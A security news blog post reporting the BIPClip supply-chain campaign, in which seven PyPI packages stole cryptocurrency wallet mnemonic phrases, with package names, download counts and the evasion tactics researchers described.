Skip to content Skip to footer

Be cautious: Certain PyPI Python packages may deplete your cryptocurrency wallets.

A group of security researchers known as threat hunters recently discovered malicious packages on the Package Index () repository. These seven packages were specifically designed to steal BIP39 mnemonic phrases, which are used to recover the private keys of cryptocurrency wallets. The attack campaign, codenamed BIPClip by ReversingLabs, has been active since at least December 4, 2022, and is the latest in a series of software supply chain attacks targeting cryptocurrency assets.

The seven packages were downloaded 7,451 times before being removed from . The list of packages includes jsBIP39-decrypt (126 downloads), bip39-mnemonic-decrypt (689 downloads), mnemonic_to_address (771 downloads), erc20-scanner (343 downloads), public-address-generator (1,005 downloads), hashdecrypt (4,292 downloads), and hashdecrypts (225 downloads).

According to security researcher Karlo Zanki, who shared a report with The Hacker News, this attack confirms that cryptocurrency remains a popular target for supply chain threat actors. Zanki also noted that the threat actors behind this campaign were careful to avoid detection, as one of the packages, mnemonic_to_address, did not contain any malicious functionality except for listing bip39-mnemonic-decrypt as a dependency, which in turn contained the malicious component.

The packages were designed to steal mnemonic phrases and send the information to a server controlled by the attackers. Two other packages, public-address-generator, and erc20-scanner, operated similarly, acting as lures to transmit the stolen information to the same server.

The package hashdecrypts worked differently. Unlike the other packages, it did not require a pair and contained code to harvest the data. ReversingLabs also discovered references to a profile named “HashSnake” in this package. The profile featured a repository called hCrypto, which advertised how to extract mnemonic phrases from crypto wallets using the package hashdecrypts.

Further investigation into the repository's commit history revealed that the campaign has been ongoing for over a year. This is evident because one of the scripts previously imported the package hashdecrypt (without the “s”) until March 1, 2024, when hashdecrypts was uploaded to .

The HashSnake account also has a presence on Telegram and YouTube, where it advertises its malicious activities with a touch of creativity. This adds a new level of sophistication to the attack, making it more dangerous and challenging to detect. The security researchers involved in uncovering the attack have urged users to be cautious when downloading packages from and to verify the package's authenticity before using it.

Leave a comment

Newsletter Signup

The Grid —
The Matrix Has Me
Big Bear Lake, CA 92315

01010011 01111001 01110011 01110100 01100101 01101101 00100000
01000110 01100001 01101001 01101100 01110101 01110010 01100101

What do all men with power want? More powerThe Oracle

Deitasoft © 2024. All Rights Reserved.